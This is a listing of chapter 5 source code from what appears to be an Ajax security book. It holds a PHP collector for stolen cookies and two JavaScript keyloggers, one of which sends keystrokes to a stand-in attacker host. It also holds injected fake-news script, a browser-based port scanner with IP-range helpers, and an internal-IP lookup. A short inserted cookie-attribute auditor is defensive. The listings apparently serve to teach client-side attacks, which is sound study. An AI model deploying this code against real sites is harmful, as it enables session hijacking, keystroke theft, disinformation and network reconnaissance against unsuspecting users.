Ajax Security - Source Code for Chapter 5

5.1 Spying on Cookies

cookie-sammler.php

<?php
// Collect the data
$geklautercookie = $_GET["geklautercookie"];
$ip = getenv ("REMOTE_ADDR");
$referer = getenv("HTTP_REFERER");
$datum = date("j. F Y, H:i");

// Assemble the entry
$daten = "Cookie: ".$geklautercookie." <br>";
$daten = $daten."IP: ".$ip." <br>";
$daten = $daten."Referer: ".$referer." <br>";
$daten = $daten."Datum und Zeit: ".$datum." <br>";
$daten = $daten." <hr> <br>";

// Write the entry to the file
$datei = fopen("geklaut.html", "a+");
fwrite($datei, $daten);
fclose($datei);
?>
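
Cookie theft of this kind depends on script in the page being able to read the cookie, so the server-side check worth running is whether session cookies are issued with HttpOnly (and Secure). The following is an added example, not one of the book's listings; the function names and the sample header values are constructed for illustration.

```javascript
// Added defensive example; all header values below are constructed samples.

// Parse one Set-Cookie header value into its name and lower-cased attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts.length ? parts[0].indexOf('=') : -1;
  if (eq < 1) return null; // no "name=value" pair: malformed header
  const cookie = { name: parts[0].slice(0, eq), attrs: {} };
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    // Flag attributes (HttpOnly, Secure) count as set whenever the name is present.
    cookie.attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return cookie;
}

// Report which protective attributes a cookie is missing.
function auditCookie(header) {
  const cookie = parseSetCookie(header);
  if (!cookie) return { name: null, findings: ['malformed Set-Cookie header'] };
  const findings = [];
  if (!('httponly' in cookie.attrs)) {
    findings.push('HttpOnly missing: cookie is readable by script via document.cookie');
  }
  if (!('secure' in cookie.attrs)) {
    findings.push('Secure missing: cookie is also sent over unencrypted HTTP');
  }
  return { name: cookie.name, findings };
}

// Audit every Set-Cookie value of a response; return only cookies with findings.
function auditResponse(setCookieHeaders) {
  return setCookieHeaders.map(auditCookie).filter((r) => r.findings.length > 0);
}

// Constructed sample response headers.
const sampleHeaders = [
  'SESSIONID=abc123; Path=/',
  'SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'theme=dark; Path=/; secure',
];
for (const r of auditResponse(sampleHeaders)) {
  console.log(r.name + ': ' + r.findings.join('; '));
}
```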

5.2 Spying on Keyboard Input

Keylogger

<script> 
var keylog = 'Tastendr&uuml;cke: '; 
document.onkeypress = function () {
   window.status = keylog += String.fromCharCode(window.event.keyCode);
} 
</script> 

Keylogger with Ajax

<script>
var serviceURL = "http://www.angreifer.example/tasten-sammler.php"
var req = new XMLHttpRequest();
var keylog = '';
document.onkeypress = function () { 
   keylog += String.fromCharCode(window.event.keyCode);
   sendeDaten(keylog)
} 

function sendeDaten(daten) {
   req.open("POST", serviceURL + "?tasten=" + encodeURIComponent(daten.value), true);
   req.send(null);
}
</script>

5.4 Injecting False Information

sc.js

document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
document.write('<p>On Friday night, George Bush made an official announcement saying that Michael Antipov (http://michael.antipov.name), a 9 year old talented security specialist was to be the chairperson of the Information Security Department of the US. The debatable decision was approved by three-hour long discussion in the Senate. ');
document.write('<p>Michael Antipov was noticed by the FBI service for his outstanding skills in the sphere of Information Security. He proved his ability to preside the abovementioned department defending 34 governmental web sites from Lebanon terrorist attacks. ');
document.write('<p>Michael Antipov, sun of the top-secret US spy, was born in Russia. 2 years of age, together with his parents, he moved to the USA to start his carrier in the CIA kindergarten. He continued his studies in the educational institution sub controlled by the CIA (names being erased for purpose of the National Security). He obtained his MS degree being at the age of 7. Having reached the age of 8 he already had a PhD.');
document.write('<p>"From now on the citizens of the USA can feel safe for the National Information Security is in the young but good hands", said George Bush in his last speech.');

5.6 Port Scanning via JavaScript

Port scanner

PortScanner = {};
PortScanner.scanPort = function (callback, host, port, timeout) {
    var timeout = (timeout == null)?100:timeout;
    var img = new Image();
    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'open');
    };
    img.onload = img.onerror;
    img.src = 'http://' + host + ':' + port;

    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'closed');
    }, timeout);
};

Scanning multiple ports

PortScanner.scanHost = function (callback, host, ports, timeout)
{
    for (var index = 0; index < ports.length; index++)
        PortScanner.scanPort(callback, host, ports[index], timeout);
};

Converting IP addresses

function erzeugeIPArray(ipString) 
{
   // Split the string into an array of strings
   var stringArray = ipString.split('.');
   // Provide an array for the integer values
   var intArray = new Array();
   var i;
   for(i = 0; i < stringArray.length; i++) 
   {
      // Convert the string into an integer value
      intArray[i] = parseInt(stringArray[i], 10);
   }
   return intArray;
}

Incrementing IP addresses

function erhoeheIP(dieIP) 
{
   var i;
   for(i = 3; i>=0; i--) 
   {
      if(dieIP[i] < 255 || i == 0) 
      {
         dieIP[i]++;
         return dieIP;
      } 
      else {
         // The value in the current segment i cannot be incremented,
         // because that would cause an overflow.
         // Reset it to 0 and continue with the segment before it;
         // the next loop iteration performs the increment.
         dieIP[i] = 0;
      }
   }
}

Determining one's own IP address

AttackAPI.dom.getInternalIP = function () {
  try {
    var sock = new java.net.Socket();

    sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
    sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));

    return sock.getLocalAddress().getHostAddress();     
    } catch (e) {}
    return '127.0.0.1';
};